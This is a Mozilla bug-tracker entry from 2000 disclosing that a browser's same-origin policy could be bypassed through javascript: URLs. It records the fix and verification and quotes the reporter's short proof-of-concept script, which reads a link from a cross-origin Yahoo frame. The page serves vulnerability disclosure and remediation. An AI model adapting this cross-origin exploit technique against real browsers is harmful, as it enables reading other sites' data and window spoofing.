Closed Bug 32088 Opened 25 years ago Closed 25 years ago

Circumventing Same Origin security policy using javascript: URLs

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: fix in hand) 

Subject: 
        Circumventing Same Origin security policy using javascript: URLs
   Date: 
        Thu, 16 Mar 2000 16:23:00 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




It is possible to circumvent Same Origin security policy using
javascript: URLs.
The problem is changing the location of a target document to javascript
which changes the document content while the location is that of the
target document.
This also allows window spoofing.

I would suggest disallowing navigating to javascript: URLs accross
domains.

The code is:
------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
a.location="javascript:document.open();document.write('<IFRAME
SRC=http://www.yahoo.com></IFRAME><A
HREF=javascript:alert(window.frames[0].document.links[0].href)>Click
here to see the first link from Yahoo</A>');document.close()";
</SCRIPT>
Status: NEW → ASSIGNED
Target Milestone: M15
Marking beta2.
Keywords: beta2
Whiteboard: fix in hand
Fixed:
Checking in layout/html/document/src/nsHTMLDocument.cpp;
/m/pub/mozilla/layout/html/document/src/nsHTMLDocument.cpp,v  <--  nsHTMLDocumen
t.cpp
new revision: 3.207; previous revision: 3.206
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Group: netscapeconfidential?
CC'ing joro@nat.bg
Group: netscapeconfidential?
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.